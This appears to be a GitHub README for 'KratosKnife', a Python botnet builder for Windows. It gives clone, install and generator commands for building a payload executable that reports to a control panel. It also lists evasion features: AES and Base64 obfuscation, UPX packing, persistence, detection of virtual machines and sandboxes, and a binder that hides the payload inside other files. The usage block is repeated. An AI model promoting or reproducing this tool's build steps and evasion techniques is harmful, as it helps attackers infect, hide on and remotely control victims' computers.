KratosKnife is a Advanced BOTNET Written in python 3 for Windows OS. Comes With Lot of Advanced Features such as Persistence & VM Detection Methods, Built-in Binder, etc
Usage
# Install dependencies
$ Install latest python 3.x
# Clone this repository
$ git clone https://github.com/PushpenderIndia/KratosKnife.git
# Go into the repository
$ cd KratosKnife/Botnet-Generator
# Installing dependencies
$ python -m pip install -r requirements.txt
# Update pyinstaller.exe path, in Generator.py (line 9)
# Getting Help Menu
$ python Generator.py --help
# Making Payload/BOTNET
$ python Generator.py -s localhost/panel -o output_file_name --icon icon/exe.ico
# Install dependencies
$ Install latest python 3.x
# Clone this repository
$ git clone https://github.com/PushpenderIndia/KratosKnife.git
# Go into the repository
$ cd KratosKnife/Botnet-Generator
# Installing dependencies
$ python -m pip install -r requirements.txt
# Update pyinstaller.exe path, in Generator.py (line 9)
# Getting Help Menu
$ python Generator.py --help
# Making Payload/BOTNET
$ python Generator.py -s localhost/panel -o output_file_name --icon icon/exe.ico
Disclaimer
THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
Generator Features
- <input type="checkbox" id="" disabled="" class="task-list-item-checkbox" checked="" > Encrypt Source Code Using AES 256 Bit Encryption
- <input type="checkbox" id="" disabled="" class="task-list-item-checkbox" checked="" > Encrypt Source Code Using Base64 Encoding
- <input type="checkbox" id="" disabled="" class="task-list-item-checkbox" checked="" > Packing Evil Exe Using UPX Packer
- <input type="checkbox" id="" disabled="" class="task-list-item-checkbox" checked="" > Interactive Mode [Generator Ask Required Parameter]
- <input type="checkbox" id="" disabled="" class="task-list-item-checkbox" checked="" > Debug Mode [Can Be Used In Debugging Payload]
- <input type="checkbox" id="" disabled="" class="task-list-item-checkbox" checked="" > Persistence Payload
- <input type="checkbox" id="" disabled="" class="task-list-item-checkbox" checked="" > 3 Powerfull Methods to Detect/Bypass VM (such as VirtualBox, VMware, Sandboxie)
- <input type="checkbox" id="" disabled="" class="task-list-item-checkbox" checked="" > Built-in File Binder
- <input type="checkbox" id="" disabled="" class="task-list-item-checkbox" checked="" > Useful Icons Inside icon Folder
Virtual Machine Bypass Methods Includes |
---|
Registry Check |
Processes and Files Check |
MAC Adderess Check Prerequisite
|
*Beware click the link!